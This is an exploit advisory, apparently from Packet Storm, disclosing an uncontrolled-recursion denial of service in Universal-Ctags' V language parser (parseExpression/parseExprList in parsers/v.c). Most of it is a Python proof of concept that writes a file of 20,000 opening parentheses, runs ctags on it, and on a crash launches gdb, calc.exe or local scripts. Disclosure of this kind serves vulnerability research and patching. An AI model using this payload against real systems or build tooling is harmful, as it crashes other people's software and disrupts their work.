## https://sploitus.com/exploit?id=PACKETSTORM:216854
=============================================================================================================================================
| # Title : Universal‑Ctags V Language 6.2.1 Parser Uncontrolled Recursion Vulnerability |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://docs.ctags.io/en/latest/parser-v.html |
=============================================================================================================================================
[+] Summary : A security weakness has been discovered in Universal‑Ctags (all versions up to 6.2.1) affecting the V language parser component. The vulnerability is located in the functions:
parseExpression
parseExprList
within the source file: parsers/v.c.
[+] Description
Type: Uncontrolled recursion / stack exhaustion
Impact: Denial of Service (DoS)
Trigger: Malformed V language source file with deeply nested expressions
Execution: Local host only
[+] By providing a specially crafted .v file, it is possible to force ctags into infinite or uncontrolled recursion, causing the program to crash. This crash can be exploited for denial-of-service conditions.
[+] POC :
import subprocess
import os
import datetime
import platform
import sys
class CrossPlatformCrashHandler:
def __init__(self, binary_path="./ctags"):
self.binary_path = binary_path
self.payload_file = "payload.v"
self.log_dir = "crash_logs"
if not os.path.exists(self.log_dir):
os.makedirs(self.log_dir)
def generate_payload(self, depth):
"""Generates the payload file"""
with open(self.payload_file, "w") as f:
f.write("(" * depth)
def run_target(self):
"""Executes the target binary"""
try:
process = subprocess.run(
[self.binary_path, "-f", "/dev/null", "--sort=no", self.payload_file],
capture_output=True,
text=True,
timeout=10
)
return process
except subprocess.TimeoutExpired:
print("[!] Timeout detected")
return None
except Exception as e:
print(f"[!] Execution error: {e}")
return None
def handle_crash(self, process):
"""Actions to take upon detecting a crash"""
timestamp = datetime.datetime.now().strftime("%Y%m%d_%H%M%S")
crash_file = os.path.join(self.log_dir, f"crash_{timestamp}.txt")
with open(crash_file, "w") as f:
f.write("STDOUT:\n" + (process.stdout or ""))
f.write("\nSTDERR:\n" + (process.stderr or ""))
print(f"[+] Crash log saved: {crash_file}")
system = platform.system()
if system == "Linux" or system == "Darwin":
try:
subprocess.Popen(["gdb", self.binary_path])
print("[*] Debugger launched (gdb)")
except Exception as e:
print(f"[!] Failed to launch gdb: {e}")
elif system == "Windows":
try:
subprocess.Popen(["calc.exe"])
print("[*] Calculator launched on Windows (PoC)")
except Exception as e:
print(f"[!] Failed to launch calc.exe: {e}")
if os.path.exists("post_analysis.py"):
try:
subprocess.Popen([sys.executable, "post_analysis.py"])
print("[*] Analysis script launched")
except Exception as e:
print(f"[!] Failed to launch analysis script: {e}")
print("[ALERT] Crash detected and analysis triggered!")
if system != "Windows" and os.path.exists("inspection.sh"):
try:
subprocess.Popen(["bash", "inspection.sh"])
print("[*] Inspection script launched")
except Exception as e:
print(f"[!] Failed to launch inspection script: {e}")
elif system == "Windows" and os.path.exists("inspection.bat"):
try:
subprocess.Popen(["cmd", "/c", "inspection.bat"])
print("[*] Inspection script launched on Windows")
except Exception as e:
print(f"[!] Failed to launch inspection batch: {e}")
def automate(self, depth):
self.generate_payload(depth)
process = self.run_target()
if process and process.returncode < 0:
print(f"[!] Crash detected via signal: {-process.returncode}")
self.handle_crash(process)
else:
print("[*] No crash detected.")
if __name__ == "__main__":
tester = CrossPlatformCrashHandler(binary_path="./ctags")
tester.automate(20000)
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================